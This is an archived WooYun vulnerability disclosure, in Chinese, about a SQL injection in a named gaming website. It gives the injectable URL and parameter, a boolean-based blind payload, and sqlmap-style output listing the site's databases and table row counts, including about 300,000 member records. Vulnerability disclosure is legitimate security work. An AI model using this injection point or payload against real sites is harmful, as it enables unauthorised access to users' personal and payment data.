乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-14: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入地址
#SQL注入URL:http://www.96wan.com/websiteapi/website_serverlist?gid=6 参数gid可控
泄露6个数据库
Parameter: gid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: gid=6 AND 1429=1429---back-end DBMS: MySQL 5available databases [6]:[*] `96wan_ucenter` [*] `96wan_web` //主站数据库[*] `96wan_wp`[*] information_schema[*] mysql[*] performance_schema
#不深入直接查下主库信息(member敏感信息泄露30万数据)
Database: 96wan_web+-------------------------+---------+| Table | Entries |+-------------------------+---------+| `96wan_game_log` | 4680784 || `96wan_login_log` | 3916792 || `96wan_member_info` | 309322 || `96wan_register_log` | 308966 || `96wan_newcard` | 155681 || `96wan_newcard2` | 150832 || `96wan_channel_member` | 93985 || `96wan_pay_log` | 75946 || `96wan_pay_ok` | 44113 || `96wan_pay_togame` | 44113 || ku36_game_log | 31458 || `96wan_code_log` | 19938 || `96wan_lhzs_card` | 12349 || ku36_member_info | 4924 || `96wan_channel_info` | 3797 || `96wan_area` | 3144 || `96wan_verify_email` | 1901 || `96wan_game_server` | 622 || `96wan_forgetpwd` | 404 || `96wan_channel` | 380 || `96wan_city` | 340 || `96wan_article` | 311 || `96wan_access` | 197 || `96wan_friendlink` | 114 || `96wan_union_channel` | 102 || `96wan_password_appeal` | 97 || `96wan_lhzs_usecard` | 96 || `96wan_node` | 82 || `96wan_test_account` | 50 || `96wan_phone_code_log` | 46 || `96wan_union_members` | 40 || `96wan_province` | 34 || `96wan_channel_source` | 33 || `96wan_game` | 25 || `96wan_pay_type` | 20 || `96wan_slidepic` | 19 || `96wan_role_user` | 17 || `96wan_tg_pass` | 16 || `96wan_pay_test` | 12 || `96wan_notice` | 7 || `96wan_singlepage` | 7 || `96wan_group` | 6 || `96wan_channel_ts` | 5 || `96wan_role` | 5 || `96wan_user` | 4 || `96wan_category` | 3 || `96wan_dept` | 3 || `96wan_groups` | 3 || `96wan_union` | 2 || `96wan_card` | 1 || `96wan_code` | 1 || `96wan_phone_code` | 1 || `96wan_sygame` | 1 || `96wan_tg_paytype` | 1 |+-------------------------+---------+
参数可控 代码农过滤吧
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)